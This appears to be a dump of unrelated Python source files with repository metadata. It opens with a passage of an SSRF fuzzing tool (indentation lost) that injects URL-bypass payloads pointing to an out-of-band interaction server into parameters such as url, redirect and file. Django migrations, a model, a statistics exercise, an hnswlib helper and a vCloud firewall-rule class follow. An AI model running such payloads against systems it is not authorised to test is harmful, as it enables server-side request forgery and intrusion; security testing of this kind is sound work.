parser.add_argument("--threads", "-n", type=int, required=False, help= 'number of threads for the tool')
parser.add_argument("--output", "-o", type=str, required=False, help='output file path')
parser.add_argument("--oneshot", "-t", action='store_true', help='fuzz with only one basic payload - to be activated in case of time constraints')
parser.add_argument("--verbose", "-v", action='store_true', help='activate verbose mode')
args = parser.parse_args()
if not (args.file or args.url):
parser.error('No input selected: Please add --file or --url as arguments.')
if not os.path.isdir('output'):
os.system("mkdir output")
if not os.path.isdir('output/threadsLogs'):
os.system("mkdir output/threadsLogs")
else:
os.system("rm -r output/threadsLogs")
os.system("mkdir output/threadsLogs")
if args.output:
outputFile = open(f"{execPath}/{args.output}", "a")
else:
outputFile = open("output/ssrf-result.txt", "a")
if args.file:
allURLs = [line.replace('\n', '') for line in open(f"{execPath}/{args.file}", "r")]
regexParams = regex.compile('(?<=(access|dbg|debug|edit|grant|clone|exec|execute|load|make|modify|reset|shell|toggle|adm|root|cfg|dest|redirect|uri|path|continue|url|window|next|data|site|html|validate|domain|callback|return|host|port|to|out|view|dir|show|navigation|open|file|document|folder|pg|php_path|doc|img|filename|file_name|image)=)(.*)(?=(&|$))', flags=regex.IGNORECASE)
extractInteractionServerURL = "(?<=] )([a-z0-9][a-z0-9][a-z0-9].*)"
def getFileSize(fileID):
interactionLogs = open(f"output/threadsLogs/interaction-logs{fileID}.txt", "r")
return len(interactionLogs.read())
def getInteractionServer():
id = random.randint(0, 999999)
os.system(f"interactsh-client -pi 1 &> output/threadsLogs/interaction-logs{id}.txt &")
time.sleep(2)
interactionServer = None
while not interactionServer:
interactionLogs = open(f"output/threadsLogs/interaction-logs{id}.txt", "r")
fileContent = interactionLogs.read()
pastInteractionLogsSize = len(fileContent)
interactionServer = regex.search(extractInteractionServerURL, fileContent)
time.sleep(2)
interactionServer = interactionServer.group()
return interactionServer, id
def exception_verbose_message(exceptionType):
if args.verbose:
if exceptionType == "timeout":
print("\nTimeout detected... URL skipped")
elif exceptionType == "redirects":
print("\nToo many redirects... URL skipped")
elif exceptionType == "others":
print("\nRequest error... URL skipped")
def splitURLS(threadsSize):
splitted = []
URLSsize = len(allURLs)
width = int(URLSsize/threadsSize)
if width == 0:
width = 1
endVal = 0
i = 0
while endVal != URLSsize:
if URLSsize <= i + 2 * width:
if len(splitted) == threadsSize - 2:
endVal = int(i + (URLSsize - i)/2)
else:
endVal = URLSsize
else:
endVal = i + width
splitted.append(allURLs[i: endVal])
i += width
return splitted
def generatePayloads(whitelistedHost, interactionHost):
generated =[
f"http://{interactionHost}",
f"//{interactionHost}",
f"http://{whitelistedHost}.{interactionHost}",
f"http://{interactionHost}?{whitelistedHost}",
f"http://{interactionHost}/{whitelistedHost}",
f"http://{interactionHost}%ff@{whitelistedHost}",
f"http://{interactionHost}%ff.{whitelistedHost}",
f"http://{whitelistedHost}%25253F@{interactionHost}",
f"http://{whitelistedHost}%253F@{interactionHost}",
f"http://{whitelistedHost}%3F@{interactionHost}",
f"http://{whitelistedHost}@{interactionHost}",
f"http://foo@{interactionHost}:80@{whitelistedHost}",
f"http://foo@{interactionHost}%20@{whitelistedHost}",
f"http://foo@{interactionHost}%09@{whitelistedHost}"
]
return generated
def smart_extract_host(url, matchedElement):
urlDecodedElem = requests.utils.unquote(matchedElement)
    hostExtractorRegex = r'(?<=(https|http):\/\/)(.*?)(?=\/)'
extractedHost = regex.search(hostExtractorRegex, urlDecodedElem)
if not extractedHost:
extractedHost = regex.search(hostExtractorRegex, url)
return extractedHost.group()
def prepare_url_with_regex(url):
replacedURL = regexParams.sub(FUZZ_PLACE_HOLDER, url)
matchedElem = regexParams.search(url)
if matchedElem:
matchedElem = matchedElem.group()
return replacedURL, matchedElem
def fuzz_SSRF(url, interactionServer, fileID):
pastInteractionLogsSize = getFileSize(fileID)
replacedURL, matchedElem = prepare_url_with_regex(url)
if not matchedElem:
return
if args.oneshot:
payloadsList = [f"http://{interactionServer}"]
else:
host = smart_extract_host(url, matchedElem)
payloadsList = generatePayloads(host, interactionServer)
if args.verbose:
if not args.threads:
print(f" + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +")
print(f"\nStarting fuzzing {replacedURL}")
for payload in payloadsList:
fuzz_and_detect_with_payload("FUZZ", replacedURL, payload, fileID)
time.sleep(2)
if isInteractionDetected(pastInteractionLogsSize, fileID):
if args.verbose:
print(f"\nSSRF identified in {replacedURL}. Determining valid payload ...")
for payload in payloadsList:
if fuzz_and_detect_with_payload("DETECT", replacedURL, payload, fileID):
print(f"SSRF detected in {replacedURL} with payload {payload}.")
with LOCK:
outputFile.write(f"SSRF detected in {replacedURL} with payload {payload}\n")
return
else:
if args.verbose:
print(f"\nNothing detected for {replacedURL}")
def fuzz_and_detect_with_payload(type ,url, payload, fileID):
pastInteractionLogsSize = getFileSize(fileID)
fuzzedUrl = url.replace(FUZZ_PLACE_HOLDER, payload)
if args.verbose:
if not args.threads:
print(f"Testing payload: {payload} ", end="\r")
requests.get(fuzzedUrl, timeout=TIMEOUT_DELAY)
if type == "DETECT":
time.sleep(2)
return isInteractionDetected(pastInteractionLogsSize, fileID)
def isInteractionDetected(pastInteractionLogsSize, fileID):
currentInteractionLogsSize = getFileSize(fileID)
if currentInteractionLogsSize != pastInteractionLogsSize:
return True
return False
def sequential_url_scan(urlList):
interactionServer, fileID = getInteractionServer()
for url in urlList:
try:
fuzz_SSRF(url, interactionServer, fileID)
except requests.exceptions.Timeout:
exception_verbose_message("timeout")
except requests.exceptions.TooManyRedirects:
exception_verbose_message("redirects")
except Exception as e:
print(f"{url} : {e}")
exception_verbose_message("others")
def main():
if args.url:
try:
sequential_url_scan([args.url])
except Exception as e:
print("\nInvalid URL")
elif args.file:
if not args.threads or args.threads == 1:
sequential_url_scan(allURLs)
else:
workingThreads = []
split = splitURLS(args.threads)
for subList in split:
t = threading.Thread(target=sequential_url_scan, args=[subList])
t.start()
workingThreads.append(t)
for thread in workingThreads:
thread.join()
outputFile.close()
if __name__ == '__main__':
main()
| true
| true
|
f70b4fbb627ce25c7b6702ad09dd5c7ee15dad9d
| 321
|
py
|
Python
|
core/migrations/0004_remove_user_username.py
|
jamesseth/Universalone
|
11aa4eef9879970baa49f5602d8ebdf83aee4b6a
|
[
"MIT"
] | null | null | null |
core/migrations/0004_remove_user_username.py
|
jamesseth/Universalone
|
11aa4eef9879970baa49f5602d8ebdf83aee4b6a
|
[
"MIT"
] | null | null | null |
core/migrations/0004_remove_user_username.py
|
jamesseth/Universalone
|
11aa4eef9879970baa49f5602d8ebdf83aee4b6a
|
[
"MIT"
] | null | null | null |
# Generated by Django 3.1.14 on 2022-03-04 18:39
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('core', '0003_user_username'),
]
operations = [
migrations.RemoveField(
model_name='user',
name='username',
),
]
| 17.833333
| 48
| 0.582555
|
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('core', '0003_user_username'),
]
operations = [
migrations.RemoveField(
model_name='user',
name='username',
),
]
| true
| true
|
f70b50ce14fd613d55f97a8be1d77a76ed98e10a
| 1,998
|
py
|
Python
|
src/import_pracownikow/migrations/0002_importpracownikowrow.py
|
iplweb/django-bpp
|
85f183a99d8d5027ae4772efac1e4a9f21675849
|
[
"BSD-3-Clause"
] | 1
|
2017-04-27T19:50:02.000Z
|
2017-04-27T19:50:02.000Z
|
src/import_pracownikow/migrations/0002_importpracownikowrow.py
|
mpasternak/django-bpp
|
434338821d5ad1aaee598f6327151aba0af66f5e
|
[
"BSD-3-Clause"
] | 41
|
2019-11-07T00:07:02.000Z
|
2022-02-27T22:09:39.000Z
|
src/import_pracownikow/migrations/0002_importpracownikowrow.py
|
iplweb/bpp
|
f027415cc3faf1ca79082bf7bacd4be35b1a6fdf
|
[
"BSD-3-Clause"
] | null | null | null |
# Generated by Django 3.0.11 on 2021-02-28 16:39
import django.contrib.postgres.fields.jsonb
import django.db.models.deletion
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
("bpp", "0240_auto_20210228_1739"),
("import_pracownikow", "0001_initial"),
]
operations = [
migrations.CreateModel(
name="ImportPracownikowRow",
fields=[
(
"id",
models.AutoField(
auto_created=True,
primary_key=True,
serialize=False,
verbose_name="ID",
),
),
("wiersz_xls", models.PositiveSmallIntegerField()),
(
"dane_z_xls",
django.contrib.postgres.fields.jsonb.JSONField(
blank=True, null=True
),
),
(
"autor",
models.ForeignKey(
on_delete=django.db.models.deletion.CASCADE, to="bpp.Autor"
),
),
(
"autor_jednostka",
models.ForeignKey(
on_delete=django.db.models.deletion.CASCADE,
to="bpp.Autor_Jednostka",
),
),
(
"jednostka",
models.ForeignKey(
on_delete=django.db.models.deletion.CASCADE, to="bpp.Jednostka"
),
),
(
"parent",
models.ForeignKey(
on_delete=django.db.models.deletion.CASCADE,
to="import_pracownikow.ImportPracownikow",
),
),
],
),
]
| 31.21875
| 87
| 0.407407
|
import django.contrib.postgres.fields.jsonb
import django.db.models.deletion
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
("bpp", "0240_auto_20210228_1739"),
("import_pracownikow", "0001_initial"),
]
operations = [
migrations.CreateModel(
name="ImportPracownikowRow",
fields=[
(
"id",
models.AutoField(
auto_created=True,
primary_key=True,
serialize=False,
verbose_name="ID",
),
),
("wiersz_xls", models.PositiveSmallIntegerField()),
(
"dane_z_xls",
django.contrib.postgres.fields.jsonb.JSONField(
blank=True, null=True
),
),
(
"autor",
models.ForeignKey(
on_delete=django.db.models.deletion.CASCADE, to="bpp.Autor"
),
),
(
"autor_jednostka",
models.ForeignKey(
on_delete=django.db.models.deletion.CASCADE,
to="bpp.Autor_Jednostka",
),
),
(
"jednostka",
models.ForeignKey(
on_delete=django.db.models.deletion.CASCADE, to="bpp.Jednostka"
),
),
(
"parent",
models.ForeignKey(
on_delete=django.db.models.deletion.CASCADE,
to="import_pracownikow.ImportPracownikow",
),
),
],
),
]
| true
| true
|
f70b522960a3a384eacd9476f9389c6890217ff6
| 970
|
py
|
Python
|
saleor/expensetypes/models.py
|
glosoftgroup/tenants
|
a6b229ad1f6d567b7078f83425a532830b71e1bb
|
[
"BSD-3-Clause"
] | 1
|
2018-05-03T06:17:02.000Z
|
2018-05-03T06:17:02.000Z
|
saleor/expensetypes/models.py
|
glosoftgroup/tenants
|
a6b229ad1f6d567b7078f83425a532830b71e1bb
|
[
"BSD-3-Clause"
] | 8
|
2018-05-07T16:42:35.000Z
|
2022-02-26T03:31:56.000Z
|
saleor/expensetypes/models.py
|
glosoftgroup/tenants
|
a6b229ad1f6d567b7078f83425a532830b71e1bb
|
[
"BSD-3-Clause"
] | null | null | null |
from __future__ import unicode_literals
from django.db import models
from django.utils.translation import pgettext_lazy
from django.utils.timezone import now
class ExpenseTypes(models.Model):
name = models.CharField(
pgettext_lazy('ExpenseTypes field', 'name'), unique=True, max_length=128)
description = models.TextField(
verbose_name=pgettext_lazy('ExpenseTypes field', 'description'), blank=True, null=True)
updated_at = models.DateTimeField(
pgettext_lazy('ExpenseTypes field', 'updated at'), auto_now=True, null=True)
created = models.DateTimeField(pgettext_lazy('ExpenseTypes field', 'created'),
default=now, editable=False)
class Meta:
app_label = 'expensetypes'
verbose_name = pgettext_lazy('ExpenseType model', 'ExpenseType')
verbose_name_plural = pgettext_lazy('ExpenseTypes model', 'ExpenseTypes')
def __str__(self):
return self.name
| 32.333333
| 95
| 0.703093
|
from __future__ import unicode_literals
from django.db import models
from django.utils.translation import pgettext_lazy
from django.utils.timezone import now
class ExpenseTypes(models.Model):
name = models.CharField(
pgettext_lazy('ExpenseTypes field', 'name'), unique=True, max_length=128)
description = models.TextField(
verbose_name=pgettext_lazy('ExpenseTypes field', 'description'), blank=True, null=True)
updated_at = models.DateTimeField(
pgettext_lazy('ExpenseTypes field', 'updated at'), auto_now=True, null=True)
created = models.DateTimeField(pgettext_lazy('ExpenseTypes field', 'created'),
default=now, editable=False)
class Meta:
app_label = 'expensetypes'
verbose_name = pgettext_lazy('ExpenseType model', 'ExpenseType')
verbose_name_plural = pgettext_lazy('ExpenseTypes model', 'ExpenseTypes')
def __str__(self):
return self.name
| true
| true
|
f70b525457f87d17c8efd833276ea214c1891035
| 265
|
py
|
Python
|
10 Days of Statistics/Day 5 Poisson Distribution II.py
|
MonwarAdeeb/HackerRank-Solutions
|
571327e9688061745000ae81c5fd74ff7a2976d4
|
[
"MIT"
] | null | null | null |
10 Days of Statistics/Day 5 Poisson Distribution II.py
|
MonwarAdeeb/HackerRank-Solutions
|
571327e9688061745000ae81c5fd74ff7a2976d4
|
[
"MIT"
] | null | null | null |
10 Days of Statistics/Day 5 Poisson Distribution II.py
|
MonwarAdeeb/HackerRank-Solutions
|
571327e9688061745000ae81c5fd74ff7a2976d4
|
[
"MIT"
] | null | null | null |
# Enter your code here. Read input from STDIN. Print output to STDOUT
averageX, averageY = [float(num) for num in input().split(" ")]
CostX = 160 + 40*(averageX + averageX**2)
CostY = 128 + 40*(averageY + averageY**2)
print(round(CostX, 3))
print(round(CostY, 3))
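# Note: for X ~ Poisson(lambda), E[X] = Var(X) = lambda, so
# E[X^2] = Var(X) + E[X]**2 = lambda + lambda**2 -- hence the
# (average + average**2) terms in both cost formulas above.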
| 33.125
| 69
| 0.686792
|
averageX, averageY = [float(num) for num in input().split(" ")]
CostX = 160 + 40*(averageX + averageX**2)
CostY = 128 + 40*(averageY + averageY**2)
print(round(CostX, 3))
print(round(CostY, 3))
| true
| true
|
f70b543d15dfc1d3ae417fb6ae739938fa4eb1f7
| 455
|
py
|
Python
|
MIPS.py
|
Stomach-ache/GLaS
|
253092cce1922711e7d9c9df601f117f3ec56e0c
|
[
"MIT"
] | null | null | null |
MIPS.py
|
Stomach-ache/GLaS
|
253092cce1922711e7d9c9df601f117f3ec56e0c
|
[
"MIT"
] | null | null | null |
MIPS.py
|
Stomach-ache/GLaS
|
253092cce1922711e7d9c9df601f117f3ec56e0c
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
import hnswlib
import numpy as np
def buildIndex(X):
dim = X.shape[1]
num_elements = X.shape[0]
data_labels = np.arange(num_elements)
p = hnswlib.Index(space = 'cosine', dim = dim)
p.init_index(max_elements = num_elements, ef_construction = 200, M = 16)
p.add_items(X, data_labels)
p.set_ef(5)
return p
def searchIndex(p, X, k=5):
labels, distances = p.knn_query(X, k = k)
return labels
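# Illustrative usage sketch (X is assumed to be a 2-D float array):
#   X = np.random.rand(1000, 128).astype(np.float32)
#   index = buildIndex(X)
#   neighbors = searchIndex(index, X[:3], k=5)  # (3, 5) array of neighbor labels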
| 22.75
| 76
| 0.643956
|
import hnswlib
import numpy as np
def buildIndex(X):
dim = X.shape[1]
num_elements = X.shape[0]
data_labels = np.arange(num_elements)
p = hnswlib.Index(space = 'cosine', dim = dim)
p.init_index(max_elements = num_elements, ef_construction = 200, M = 16)
p.add_items(X, data_labels)
p.set_ef(5)
return p
def searchIndex(p, X, k=5):
labels, distances = p.knn_query(X, k = k)
return labels
| true
| true
|
f70b548ce4f7e4c8370edd4d6309077c0b3aeee4
| 15,065
|
py
|
Python
|
pyvcloud/vcd/firewall_rule.py
|
kousgy123/pyvcloud
|
46cbac266b7db64c32ae2a9b860d2c82f4d00a36
|
[
"Apache-2.0"
] | null | null | null |
pyvcloud/vcd/firewall_rule.py
|
kousgy123/pyvcloud
|
46cbac266b7db64c32ae2a9b860d2c82f4d00a36
|
[
"Apache-2.0"
] | null | null | null |
pyvcloud/vcd/firewall_rule.py
|
kousgy123/pyvcloud
|
46cbac266b7db64c32ae2a9b860d2c82f4d00a36
|
[
"Apache-2.0"
] | null | null | null |
# VMware vCloud Director Python SDK
# Copyright (c) 2014-2019 VMware, Inc. All Rights Reserved.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from pyvcloud.vcd.client import create_element
from pyvcloud.vcd.client import EntityType
from pyvcloud.vcd.exceptions import InvalidParameterException
from pyvcloud.vcd.gateway import Gateway
from pyvcloud.vcd.gateway_services import GatewayServices
from pyvcloud.vcd.network_url_constants import FIREWALL_RULE_URL_TEMPLATE
from pyvcloud.vcd.network_url_constants import FIREWALL_RULES_URL_TEMPLATE
from pyvcloud.vcd.network_url_constants import FIREWALL_URL_TEMPLATE
class FirewallRule(GatewayServices):
__SOURCE = 'source'
__DESTINATION = 'destination'
__GROUP_OBJECT_LIST = [
'securitygroup', 'ipset', 'virtualmachine', 'network'
]
__VNIC_GROUP_LIST = ['gatewayinterface']
__APPLICATION = 'application'
__SERVICE = 'service'
__PROTOCOL_LIST = ['tcp', 'udp', 'icmp', 'any']
def _build_self_href(self, rule_id):
rule_href = (
self.network_url + FIREWALL_RULE_URL_TEMPLATE).format(rule_id)
self.href = rule_href
def _extract_id(self, rule_href):
rule_id_index = rule_href.index(FIREWALL_RULES_URL_TEMPLATE) + \
len(FIREWALL_RULES_URL_TEMPLATE) + 1
return rule_href[rule_id_index:]
def __config_url(self):
config_index = self.href.index(FIREWALL_URL_TEMPLATE)
return self.href[:config_index] + FIREWALL_URL_TEMPLATE
def _reload(self):
"""Reloads the resource representation of the Firewall rule."""
self.resource = \
self.client.get_resource(self.href)
def delete(self):
"""Delete a Firewall rule from gateway."""
self._get_resource()
return self.client.delete_resource(self.href)
def edit(self,
source_values=None,
destination_values=None,
services=None,
new_name=None):
"""Edit a Firewall rule.
:param list source_values: list of source values. e.g.,
[value:value_type]
:param list destination_values: list of destination values. e.g.,
[value:value_type]
:param list services: protocol to port mapping.
e.g., [{'tcp' : {'any' : any}}]
:param str new_name: new name of the firewall rule.
"""
self._get_resource()
self.validate_types(source_values, FirewallRule.__SOURCE)
self.validate_types(destination_values, FirewallRule.__DESTINATION)
firewall_rule_temp = self.resource
if source_values:
if not hasattr(firewall_rule_temp, FirewallRule.__SOURCE):
firewall_rule_temp.append(
create_element(FirewallRule.__SOURCE))
if not hasattr(firewall_rule_temp.source, 'exclude'):
firewall_rule_temp.source.append(
create_element('exclude', False))
self._populate_objects_info(firewall_rule_temp, source_values,
FirewallRule.__SOURCE)
if destination_values:
if not hasattr(firewall_rule_temp, FirewallRule.__DESTINATION):
firewall_rule_temp.append(
create_element(FirewallRule.__DESTINATION))
if not hasattr(firewall_rule_temp.destination, 'exclude'):
firewall_rule_temp.destination.append(
create_element('exclude', False))
self._populate_objects_info(firewall_rule_temp, destination_values,
FirewallRule.__DESTINATION)
if services:
if not hasattr(firewall_rule_temp, FirewallRule.__APPLICATION):
firewall_rule_temp.append(
create_element(FirewallRule.__APPLICATION))
self._populate_services(firewall_rule_temp, services)
if new_name:
firewall_rule_temp.name = new_name
self.client.put_resource(self.href, firewall_rule_temp,
EntityType.DEFAULT_CONTENT_TYPE.value)
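    # Illustrative call sketch (values are hypothetical; formats follow the
    # docstring above -- value:value_type entries and protocol-to-port maps):
    #   rule.edit(source_values=['ExtNw:gatewayinterface', '10.1.1.1:ip'],
    #             services=[{'tcp': {'any': 'any'}}],
    #             new_name='renamed-rule')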
def _populate_services(self, firewall_rule_temp, services):
"""Populates service elements.
:param firewall_rule_temp: Firewall rule
:param [] services: protocol to port mapping.
e.g., [{'tcp' : {'any' : any}}]
"""
if services:
for service in services:
protocol = [k for k in service.keys()][0]
if protocol not in FirewallRule.__PROTOCOL_LIST:
valid_protocols = ', '.join(FirewallRule.__PROTOCOL_LIST)
raise InvalidParameterException(
protocol + " is not valid. It should be from " +
valid_protocols)
value = service.get(protocol)
source_port = [port for port in value.keys()][0]
destination_port = value.get(source_port)
self.__populate_protocol_elements(firewall_rule_temp, protocol,
source_port,
destination_port)
def __populate_protocol_elements(self, firewall_rule_temp, protocol,
source_port, destination_port):
"""Populate protocol elements. It mutates the firewall rule object.
:param firewall_rule_temp: Firewall rule obj
:param protocol: protocol
:param source_port: source port
:param destination_port: destination port
"""
application_tag = firewall_rule_temp.application
service_tag = create_element('service')
service_tag.append(create_element('protocol', protocol))
service_tag.append(create_element('port', destination_port))
service_tag.append(create_element('sourcePort', source_port))
if protocol == 'icmp':
service_tag.append(create_element('icmpType', 'any'))
application_tag.append(service_tag)
def _populate_objects_info(self, firewall_rule_temp, values, type):
"""It will mutate firewall_rule_temp.
:param firewall_rule_temp: Firewall rule object resource
:param list values: list of values
:param str type: type. e.g., source, destination
"""
for value in values:
values_arr = value.split(':')
object_type = values_arr[1]
object = values_arr[0]
if type == FirewallRule.__SOURCE:
firewall_rule_temp.source.append(
self._get_group_element(type, object_type, object))
if type == FirewallRule.__DESTINATION:
firewall_rule_temp.destination.append(
self._get_group_element(type, object_type, object))
def _get_group_element(self, type, object_type, value):
"""Get group element base upon the type and object type.
:param str type: It can be source/destination
:param str object_type: Possible values for this would be
'gatewayinterface','virtualmachine','network', 'ipset',
'securitygroup', 'ip'
:param str value: value
:return: group objectified element
        :rtype: lxml.objectify.ObjectifiedElement
"""
if object_type == 'ip':
return create_element('ipAddress', value)
if object_type in FirewallRule.__GROUP_OBJECT_LIST:
return self.__find_element(type, object_type, value,
'groupingObjectId')
elif object_type in FirewallRule.__VNIC_GROUP_LIST:
return self.__find_element(type, object_type, value, 'vnicGroupId')
def __find_element(self, type, object_type, value, group_type):
"""Find element in the properties using group type.
:param str type: It can be source/destination
:param dict object_type: object types
:param str value: value
:param str group_type: group type. e.g., groupingObjectId
"""
gateway_res = Gateway(self.client, resource=self.parent)
object_list = gateway_res.list_firewall_objects(type, object_type)
for object in object_list:
if object.get('name') == value:
properties = object.get('prop')
for prop in properties:
if prop.get('name') == group_type:
return create_element(group_type, prop.get('value'))
def validate_types(self, source_types, type):
"""Validate input param for valid type.
:param list source_types: list of value:value_type. e.g.,
ExtNw:gatewayinterface
:param str type: It can be source/destination
:raise: InvalidParameterException: exception if input param is not
valid.
"""
if source_types:
valid_type_list = [
'gatewayinterface', 'virtualmachine', 'network', 'ipset',
'securitygroup', 'ip'
]
for source_type in source_types:
if source_type.lower() == 'any':
continue
source_type_arr = source_type.split(':')
if len(source_type_arr) <= 1:
raise InvalidParameterException(
type + " type should be in the format of "
"value:value_type. for ex: "
"ExtNw:gatewayinterface")
valid_type = source_type_arr[1]
if valid_type not in valid_type_list:
valid_type_list_str = ','.join(valid_type_list)
raise InvalidParameterException(
valid_type + " param is not valid. It should be "
"from " + valid_type_list_str)
def enable_disable_firewall_rule(self, is_enabled):
"""Enabled disabled firewall rule from gateway.
:param bool is_enabled: flag to enable/disable the firewall rule.
"""
current_firewall_status = self._get_resource().enabled
if is_enabled == current_firewall_status:
return
        self._get_resource().enabled = is_enabled
        return self.client.put_resource(
            self.href, self._get_resource(),
            EntityType.DEFAULT_CONTENT_TYPE.value)
def info_firewall_rule(self):
"""Get the details of firewall rule.
        :return: Dictionary having firewall rule details.
e.g.
{'Id': 196609, 'Name': 'Test rule', 'Rule type':'user',
'Enabled':'True','Logging enabled':'True','Action':'Accept'}
:rtype: Dictionary
"""
firewall_rule_info = {}
resource = self._get_resource()
firewall_rule_info['Id'] = resource.id
firewall_rule_info['Name'] = resource.name
firewall_rule_info['Rule type'] = resource.ruleType
firewall_rule_info['Enabled'] = resource.enabled
firewall_rule_info['Logging enabled'] = resource.loggingEnabled
firewall_rule_info['Action'] = resource.action
return firewall_rule_info
def list_firewall_rule_source_destination(self, type):
"""Get the list of firewall rule source/destination.
:param str type: It can be source/destination
        :return: dict of firewall rule's source/destination details.
e.g.
{'exclude':'True','ipAddress':['10.112.12.12','10.232.1.2'],
'vnicGroupId':['vse','external','internal','vnic-0'],
'groupingObjectId':['1f0aab71-6d11-4567-994e-2c090fea7350:ipset',
'urn:vcloud:network:3ed60402-904f-410d-913c-6da77b43a257:']
}
:rtype: dict
"""
resource = self._get_resource()
firewall_rule_source_destination = {}
if hasattr(resource, type):
if hasattr(resource[type], 'exclude'):
firewall_rule_source_destination['exclude'] = resource[
type].exclude
if hasattr(resource[type], 'vnicGroupId'):
firewall_rule_source_destination['vnicGroupId'] = [
vnicGroupId for vnicGroupId in resource[type].vnicGroupId
]
if hasattr(resource[type], 'ipAddress'):
firewall_rule_source_destination['ipAddress'] = [
ipAddress for ipAddress in resource[type].ipAddress
]
if hasattr(resource[type], 'groupingObjectId'):
firewall_rule_source_destination['groupingObjectId'] = [
groupingObjectId
for groupingObjectId in resource[type].groupingObjectId
]
return firewall_rule_source_destination
def _build_firewall_rules_href(self):
return self.network_url + FIREWALL_URL_TEMPLATE
def update_firewall_rule_sequence(self, index):
"""Change firewall rule's sequence of gateway.
:param int index: new sequence index of firewall rule.
"""
index = int(index)
gateway_res = Gateway(self.client, resource=self.parent)
firewall_rule = gateway_res.get_firewall_rules()
resource = self._get_resource()
for rule in firewall_rule.firewallRules.firewallRule:
if rule.id == resource.id:
firewall_rule.firewallRules.remove(rule)
firewall_rule.firewallRules.insert(index, rule)
break
return self.client.put_resource(self._build_firewall_rules_href(),
firewall_rule,
EntityType.DEFAULT_CONTENT_TYPE.value)
def delete_firewall_rule_source_destination(self, value, type):
"""Delete firewall rule's source/destination value of gateway.
It will delete all source/destination value of given value.
:param str value: value to remove from source/destination.
:param str type: It can be source/destination
"""
resource = self._get_resource()
if hasattr(resource, type):
for object in resource[type].iter():
if object == value:
resource[type].remove(object)
return self.client.put_resource(self.href, resource,
EntityType.DEFAULT_CONTENT_TYPE.value)
| 44.308824
| 79
| 0.62237
|
from pyvcloud.vcd.client import create_element
from pyvcloud.vcd.client import EntityType
from pyvcloud.vcd.exceptions import InvalidParameterException
from pyvcloud.vcd.gateway import Gateway
from pyvcloud.vcd.gateway_services import GatewayServices
from pyvcloud.vcd.network_url_constants import FIREWALL_RULE_URL_TEMPLATE
from pyvcloud.vcd.network_url_constants import FIREWALL_RULES_URL_TEMPLATE
from pyvcloud.vcd.network_url_constants import FIREWALL_URL_TEMPLATE
class FirewallRule(GatewayServices):
__SOURCE = 'source'
__DESTINATION = 'destination'
__GROUP_OBJECT_LIST = [
'securitygroup', 'ipset', 'virtualmachine', 'network'
]
__VNIC_GROUP_LIST = ['gatewayinterface']
__APPLICATION = 'application'
__SERVICE = 'service'
__PROTOCOL_LIST = ['tcp', 'udp', 'icmp', 'any']
def _build_self_href(self, rule_id):
rule_href = (
self.network_url + FIREWALL_RULE_URL_TEMPLATE).format(rule_id)
self.href = rule_href
def _extract_id(self, rule_href):
rule_id_index = rule_href.index(FIREWALL_RULES_URL_TEMPLATE) + \
len(FIREWALL_RULES_URL_TEMPLATE) + 1
return rule_href[rule_id_index:]
def __config_url(self):
config_index = self.href.index(FIREWALL_URL_TEMPLATE)
return self.href[:config_index] + FIREWALL_URL_TEMPLATE
def _reload(self):
self.resource = \
self.client.get_resource(self.href)
def delete(self):
self._get_resource()
return self.client.delete_resource(self.href)
def edit(self,
source_values=None,
destination_values=None,
services=None,
new_name=None):
self._get_resource()
self.validate_types(source_values, FirewallRule.__SOURCE)
self.validate_types(destination_values, FirewallRule.__DESTINATION)
firewall_rule_temp = self.resource
if source_values:
if not hasattr(firewall_rule_temp, FirewallRule.__SOURCE):
firewall_rule_temp.append(
create_element(FirewallRule.__SOURCE))
if not hasattr(firewall_rule_temp.source, 'exclude'):
firewall_rule_temp.source.append(
create_element('exclude', False))
self._populate_objects_info(firewall_rule_temp, source_values,
FirewallRule.__SOURCE)
if destination_values:
if not hasattr(firewall_rule_temp, FirewallRule.__DESTINATION):
firewall_rule_temp.append(
create_element(FirewallRule.__DESTINATION))
if not hasattr(firewall_rule_temp.destination, 'exclude'):
firewall_rule_temp.destination.append(
create_element('exclude', False))
self._populate_objects_info(firewall_rule_temp, destination_values,
FirewallRule.__DESTINATION)
if services:
if not hasattr(firewall_rule_temp, FirewallRule.__APPLICATION):
firewall_rule_temp.append(
create_element(FirewallRule.__APPLICATION))
self._populate_services(firewall_rule_temp, services)
if new_name:
firewall_rule_temp.name = new_name
self.client.put_resource(self.href, firewall_rule_temp,
EntityType.DEFAULT_CONTENT_TYPE.value)
def _populate_services(self, firewall_rule_temp, services):
if services:
for service in services:
protocol = [k for k in service.keys()][0]
if protocol not in FirewallRule.__PROTOCOL_LIST:
valid_protocols = ', '.join(FirewallRule.__PROTOCOL_LIST)
raise InvalidParameterException(
protocol + " is not valid. It should be from " +
valid_protocols)
value = service.get(protocol)
source_port = [port for port in value.keys()][0]
destination_port = value.get(source_port)
self.__populate_protocol_elements(firewall_rule_temp, protocol,
source_port,
destination_port)
def __populate_protocol_elements(self, firewall_rule_temp, protocol,
source_port, destination_port):
application_tag = firewall_rule_temp.application
service_tag = create_element('service')
service_tag.append(create_element('protocol', protocol))
service_tag.append(create_element('port', destination_port))
service_tag.append(create_element('sourcePort', source_port))
if protocol == 'icmp':
service_tag.append(create_element('icmpType', 'any'))
application_tag.append(service_tag)
def _populate_objects_info(self, firewall_rule_temp, values, type):
for value in values:
values_arr = value.split(':')
object_type = values_arr[1]
object = values_arr[0]
if type == FirewallRule.__SOURCE:
firewall_rule_temp.source.append(
self._get_group_element(type, object_type, object))
if type == FirewallRule.__DESTINATION:
firewall_rule_temp.destination.append(
self._get_group_element(type, object_type, object))
def _get_group_element(self, type, object_type, value):
if object_type == 'ip':
return create_element('ipAddress', value)
if object_type in FirewallRule.__GROUP_OBJECT_LIST:
return self.__find_element(type, object_type, value,
'groupingObjectId')
elif object_type in FirewallRule.__VNIC_GROUP_LIST:
return self.__find_element(type, object_type, value, 'vnicGroupId')
def __find_element(self, type, object_type, value, group_type):
gateway_res = Gateway(self.client, resource=self.parent)
object_list = gateway_res.list_firewall_objects(type, object_type)
